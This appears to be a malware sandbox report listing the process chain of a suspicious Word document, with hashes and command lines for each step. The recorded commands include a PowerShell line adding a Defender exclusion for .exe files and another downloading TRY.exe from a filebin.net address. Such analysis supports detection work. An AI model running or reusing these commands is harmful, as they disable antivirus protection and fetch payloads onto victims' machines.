Data Ascii: [\\?>>=]^^@JACNw{^__AQFJZ



Target ID:0
Start time:09:19:12
Start date:20/04/2022
Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):false
Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase:0x13f890000
File size:1423704 bytes
MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Target ID:2
Start time:09:19:15
Start date:20/04/2022
Path:C:\Windows\System32\msiexec.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\msiexec.exe /V
Imagebase:0xff7e0000
File size:128512 bytes
MD5 hash:AC2E7152124CEED36846BD1B6592A00F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

Target ID:4
Start time:09:19:19
Start date:20/04/2022
Path:C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):true
Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding A7515E85DB42A85129F32A151C15AD96
Imagebase:0x310000
File size:73216 bytes
MD5 hash:4315D6ECAE85024A0567DF2CB253B7B0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

Target ID:5
Start time:09:19:23
Start date:20/04/2022
Path:C:\Windows\SysWOW64\icacls.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
Imagebase:0x6b0000
File size:27136 bytes
MD5 hash:1542A92D5C6F7E1E80613F3466C9CE7F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

Target ID:7
Start time:09:19:24
Start date:20/04/2022
Path:C:\Windows\SysWOW64\expand.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
Imagebase:0xde0000
File size:53248 bytes
MD5 hash:659CED6D7BDA047BCC6048384231DB9F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

Target ID:9
Start time:09:19:27
Start date:20/04/2022
Path:C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe
Wow64 process (32bit):false
Commandline:"C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe"
Imagebase:0x13fb60000
File size:155136 bytes
MD5 hash:96DF7B0C491646EFC2E5F2E9F0443B8B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low

Target ID:10
Start time:09:19:30
Start date:20/04/2022
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd /c thai.bat
Imagebase:0x4a1d0000
File size:345088 bytes
MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Target ID:12
Start time:09:19:31
Start date:20/04/2022
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell -command "Set-MpPreference -ExclusionExtension ".exe"
Imagebase:0x13f770000
File size:473600 bytes
MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:.Net C# or VB.NET
Reputation:high

Target ID:13
Start time:09:19:34
Start date:20/04/2022
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell -command "Invoke-WebRequest -uri https://filebin.net/rf43v6qzghbj7h7b/TRY.exe -o TRY.exe"
Imagebase:0x13f910000
File size:473600 bytes
MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:.Net C# or VB.NET
Reputation:high

Target ID:15
Start time:09:19:38
Start date:20/04/2022
Path:C:\Windows\SysWOW64\icacls.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\." /SETINTEGRITYLEVEL (CI)(OI)LOW
Imagebase:0xee0000
File size:27136 bytes
MD5 hash:1542A92D5C6F7E1E80613F3466C9CE7F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

Target ID:17
Start time:09:19:46
Start date:20/04/2022
Path:C:\Windows\System32\rundll32.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
Imagebase:0xffa50000
File size:45568 bytes
MD5 hash:DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

No disassembly